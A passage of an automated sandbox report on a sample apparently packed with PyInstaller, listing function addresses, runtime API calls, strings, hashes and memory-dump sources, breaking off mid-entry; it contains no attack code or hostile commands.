                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentMessageProcess
                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                      • API String ID: 1672936522-3797743490
                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction ID: 3055df954e2b3d5bd7d7a290782d4073e45d36552c9a0a8594bc5bb4e2f4d773
                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction Fuzzy Hash: 7421E562709B4182E751ABA4F8807EAB364FB887C0F800135EE9D6B799DF3CD245C790
                                                                                      Function 00007FF7F3DD2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7F3DD1B99), ref: 00007FF7F3DD2760
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-1591803126
                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction ID: 567157e596f86f5239f0376b56b1dbb57d0e5dc230794ac905fcb71b7fdcb9ab
                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction Fuzzy Hash: 8F21A67261978152E7A0ABA1F8817E6B394EF883C0F800135FE9D67699DF3CD1458790
                                                                                      Function 00007FFDFB3A8960 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974868429.00007FFDFB201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974853382.00007FFDFB200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975033574.00007FFDFB482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975033574.00007FFDFB4A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975033574.00007FFDFB4B1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975033574.00007FFDFB527000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975259707.00007FFDFB6F6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975296972.00007FFDFB75D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975312805.00007FFDFB765000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975326824.00007FFDFB766000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975340932.00007FFDFB767000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975354634.00007FFDFB768000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975398090.00007FFDFB7EF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975412610.00007FFDFB7F1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975426919.00007FFDFB7FB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975448627.00007FFDFB820000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975462487.00007FFDFB821000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975475901.00007FFDFB822000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975492147.00007FFDFB823000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975505766.00007FFDFB825000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975525392.00007FFDFB831000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975539710.00007FFDFB832000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975565797.00007FFDFB874000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975586760.00007FFDFB891000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb200000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID: &|$
                                                                                      • API String ID: 2933794660-2080911723
                                                                                      • Opcode ID: d2285d0ca78b08e9284e6539fe4cd286835083a25521d89012cfe7de672bd859
                                                                                      • Instruction ID: 371ea959a7c529ca146129aa8be3802ad151b00a3aaa40a0a8813d51b2b9d672
                                                                                      • Opcode Fuzzy Hash: d2285d0ca78b08e9284e6539fe4cd286835083a25521d89012cfe7de672bd859
                                                                                      • Instruction Fuzzy Hash: 88112A26B15F068AEB00DF60E8646B833A4FB19758F441E35EA6D86BA8EF7CD154C340
                                                                                      Function 00007FF7F3DE9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction ID: 3407cf8a558331a01aeb401f858656d33aa12e054d4b196cec205c9ccbf1a42e
                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction Fuzzy Hash: 49F0C861B0A70681EB94ABA0E48473A9760FF45764F840335C97E5E1E8CF3CD084C3A0
                                                                                      Function 00007FFE126CA920 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::$Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 826178784-0
                                                                                      • Opcode ID: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
                                                                                      • Instruction ID: 957ee6a540dcaa33ccaed6f2b3ec518699d830bac334dbf9ac8346a8062684f1
                                                                                      • Opcode Fuzzy Hash: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
                                                                                      • Instruction Fuzzy Hash: 84417E22A18E5A89EB04EF63DC511BC37A4BB14BA0BD540B2DA8D537E5DF7CE865C300
                                                                                      Function 00007FF7F3DF9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _set_statfp
                                                                                      • String ID:
                                                                                      • API String ID: 1156100317-0
                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction ID: 7bd888f195acad3f54dca21b5bce1121a1b453f0fb4377b6c8e2670ea6b44924
                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction Fuzzy Hash: CF118622D5CA4381F7E831F5E4D1379A090AF5936CF840634EA7E3E6DE8E7C644141A0
                                                                                      Function 00007FF7F3DEB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3AF
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3CE
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3F6
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB407
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                      • Instruction ID: ae4ffe7bfd6d462ffd2f109e2f93de5e328a4a68a7ad24208f5a5b099be51442
                                                                                      • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                      • Instruction Fuzzy Hash: B7115E60E0D60241FBDDB3A59542279E9415F447B0FC94334DC7E6EBD6DD2CB48143A2
                                                                                      Function 00007FF7F3DEB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                      • Instruction ID: 002245d9623c70b61ea1db2552dc84080bafb52522b8f90d0296bb92c23053a7
                                                                                      • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                      • Instruction Fuzzy Hash: 6311F260A0E60741FBEC72A1885227E9A424F85730FC94734D97E6E6C2DD2CB98046F2
                                                                                      Function 00007FF7F3DE5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: verbose
                                                                                      • API String ID: 3215553584-579935070
                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction ID: b8ec8516d5bbb46c082a30314a0a77c9678a46eff74ed2d735c5d8fc6e07b228
                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction Fuzzy Hash: BA910932A0864641F7A9AEA4D45037DBB91AB40B54FC44331DABD6B3D5DF3CE48583A2
                                                                                      Function 00007FF7F3DEFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                      • API String ID: 3215553584-1196891531
                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction ID: 6b25ed96f8289da615756aead5ba728e20c659cdf9cf45904e3ff5b9186b8bcb
                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction Fuzzy Hash: 7F81C772D0824285F7ED7EE58140238AEA8AB11B44FD74231D92DBF2C5DB2DF58183A3
                                                                                      Function 00007FFE126C470C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126C488B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort
                                                                                      • String ID: $csm$csm
                                                                                      • API String ID: 4206212132-1512788406
                                                                                      • Opcode ID: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
                                                                                      • Instruction ID: ff641de92d7c02ed2079cbd33759b67dc5644a5e5896da4bfe50f8abf75144b3
                                                                                      • Opcode Fuzzy Hash: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
                                                                                      • Instruction Fuzzy Hash: 7D71BF3290DAD186D725DF26D88037D7BA0FB45BA8F848176DE8C07AE9CB6CD4A1C740
                                                                                      Function 00007FF7F3DDD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 2395640692-1018135373
                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction ID: 8a6fca9462f787b1f4c90fc79f9509dd796580b23ece198b5d92a7beda42b32f
                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction Fuzzy Hash: 4451B032B196029ADF94AF95D444A38B791FF44B88F908130DA6E5B7C8DF7CE841C7A0
                                                                                      Function 00007FF7F3DDF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3896166516-3733052814
                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction ID: 26244831693c7a0feffde000285c480376d94f467af32b59a649e4efba219b37
                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction Fuzzy Hash: E051A632A0838286DBB4AFA1D044378B7A8FB55B88F954135DA6C5BBC5CF3CE450C791
                                                                                      Function 00007FF7F3DDEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 3544855599-2084237596
                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction ID: b1203d908cccfa1e353a21fb3e2e587374a4184a124dc26d885d84b8effe4fdd
                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction Fuzzy Hash: 7F61A432908BC585DBB0AB65E4403AAF7A4FB85784F444235EBAC1B795CF7CD194CB50
                                                                                      Function 00007FFE126C44E4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126C45DB
                                                                                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE126C45EB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 4108983575-3733052814
                                                                                      • Opcode ID: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
                                                                                      • Instruction ID: 6374db72a8c02b0c54e2f727f349a9604fcb0800474a2cb9901b305a37031d63
